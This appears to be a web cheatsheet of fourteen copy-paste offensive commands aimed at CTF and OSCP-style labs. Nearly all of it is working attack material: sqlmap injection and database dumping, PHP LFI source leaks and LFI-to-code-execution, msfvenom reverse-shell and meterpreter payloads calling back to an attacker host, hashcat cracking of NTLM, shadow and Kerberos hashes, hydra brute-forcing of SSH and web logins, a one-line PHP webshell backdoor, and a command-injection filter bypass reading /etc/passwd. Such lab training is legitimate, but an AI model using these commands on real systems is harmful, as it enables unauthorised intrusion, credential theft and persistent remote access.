ZeroBox

Exploitation & Payloads cheatsheet

14 copy-paste commands for exploitation & payloads in CTFs and OSCP-style labs. Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.

SQLmap Automated Injection & Database Dump

Batch automated SQL injection extraction with risk and level escalation.

sqlmap -u "http://{TARGET_IP}/item.php?id=1" --batch --random-agent --level=3 --risk=2 --dbs

sqlmapsqlidatabasedump

SQLmap Target Saved HTTP Request File

Pass raw saved Burp Suite POST request file to extract DB tables.

sqlmap -r request.txt -p username --batch --current-db --dump

sqlmapburppostsqli

PHP Filter Base64 LFI Wrapper

Read source code of PHP scripts through base64 conversion filter.

http://{TARGET_IP}/index.php?page=php://filter/convert.base64-encode/resource=config.php

lfiphp-filtersource-leak

LFI to RCE via Apache /proc/self/environ

Inject User-Agent payload into environment file for code execution.

curl -s -H "User-Agent: <?php system('id'); ?>" "http://{TARGET_IP}/view.php?file=/proc/self/environ"

lfirceproc

msfvenom Linux x64 Staged Reverse TCP ELF

Compile standalone ELF reverse shell binary for x64 Linux target.

msfvenom -p linux/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf -o shell.elf

msfvenompayloadelflinux

msfvenom Windows x64 Reverse Meterpreter EXE

Generate raw Windows x64 executable reverse meterpreter.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe -o payload.exe

msfvenommeterpreterexewindows

Hashcat NTLM Hashes (Mode 1000)

High-speed GPU cracking of Windows NTLM hashes dumped from SAM or NTDS.dit.

hashcat -m 1000 ntlm.hashes /usr/share/wordlists/rockyou.txt -O

hashcatntlmcrackingwindows

Hashcat Linux /etc/shadow Hashes (Mode 1800)

Crack SHA512crypt ($6$) passwords dumped from Linux /etc/shadow.

hashcat -m 1800 shadow.hashes /usr/share/wordlists/rockyou.txt -O

hashcatshadowsha512linux

Hashcat Kerberos 5 TGS (Mode 13100)

Crack Kerberoasted Service Principal Name tickets to reveal service account passwords.

hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt -O

hashcatkerberoasttgsactive-directory

Hashcat Kerberos 5 AS-REP (Mode 18200)

Crack AS-REP hashes captured for accounts with Kerberos preauthentication disabled.

hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt -O

hashcatasrepkerberosactive-directory

Hydra Multi-Threaded SSH Brute Force

Brute-force SSH service credentials using rockyou password list.

hydra -l {USER} -P /usr/share/wordlists/rockyou.txt {TARGET_IP} ssh -t 4

hydrasshbruteforce

Hydra Web Login Form Brute Force

Target HTTP POST web login endpoint with username and password dictionary.

hydra -l admin -P /usr/share/wordlists/rockyou.txt {TARGET_IP} http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid credentials"

hydrahttpwebbruteforce

Minimal PHP Single-Line Backdoor

Lightweight PHP command execution backdoor for quick web root persistence.

echo '<?php system($_GET["cmd"]); ?>' > shell.php

webshellphpbackdoor

Command Injection Space Filter Bypass ($IFS)

Bypass space character filtering in vulnerable web commands using bash internal field separator.

cat$IFS/etc/passwd

cmd-injectionbypassfilterlinux

Use these commands with your values filled in. ZeroBox interpolates target IP, domain and credentials into every command. Open the cheatsheet

More cheatsheets